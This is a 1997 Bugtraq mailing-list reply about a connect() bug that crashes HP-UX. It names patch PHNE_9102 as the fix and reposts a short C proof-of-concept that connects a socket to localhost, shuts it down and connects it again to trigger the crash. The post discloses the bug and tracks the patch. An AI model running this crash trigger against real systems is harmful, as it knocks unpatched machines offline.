Bugtraq archives for 1st quarter (Jan-Mar) 1997: Re: Bug in connect() ?

Re: Bug in connect() ?

Frank Hofmann (hofmannWPAX01.PHYSIK.UNI-WUERZBURG.DE)
Mon, 10 Mar 1997 20:25:58 +0100

On Fri, 7 Mar 1997, Frank Hofmann wrote:

[ ... ]
> I'm gonna try some recent HP patches as I had one report that HP/UX 9.05
> is vulnerable and one that it is not. Perhaps it's fixed and I'm missing
> the patch.

I indeed did miss the patch. For my 10.01 box, PHNE_9102 (ARPA transport
cumulative patch) fixes the crash. I did not have this installed as I
thought it to be mostly identical to the earlier PHNE_9032 (remember the
ping attack ?). Obviously it is not.
Has anyone tried the corresponding patches on other HP/UX versions?

Frank Hofmann

Here's the code again, for those having missed the original posting:

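#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>     /* exit(), atoi() */
#include <string.h>     /* memset() */
#include <strings.h>    /* bcopy() */

int main(int argc, char **argv)
{
    int sock;
    struct sockaddr_in server;
    struct hostent *hp;

    if (argc > 3) exit(-1);

    sock = socket(AF_INET, SOCK_STREAM, 0);
    hp = gethostbyname("localhost");
    if (sock < 0 || hp == NULL) exit(-1);

    memset(&server, 0, sizeof server);
    bcopy((char*)hp->h_addr, (char*)&server.sin_addr, hp->h_length);
    server.sin_family = AF_INET;
    /* sin_port is in network byte order (a no-op on big-endian hosts) */
    server.sin_port = htons((argc >= 2) ? atoi(argv[1]) : 23);
    /* first connect, then shut down both directions of the socket */
    connect(sock, (struct sockaddr *)&server, sizeof server);
    shutdown(sock, 2);
    /* second connect() on the same socket after shutdown() */
    server.sin_port = htons((argc == 3) ? atoi(argv[2]) : 24);
    connect(sock, (struct sockaddr *)&server, sizeof server);
    return 0;
}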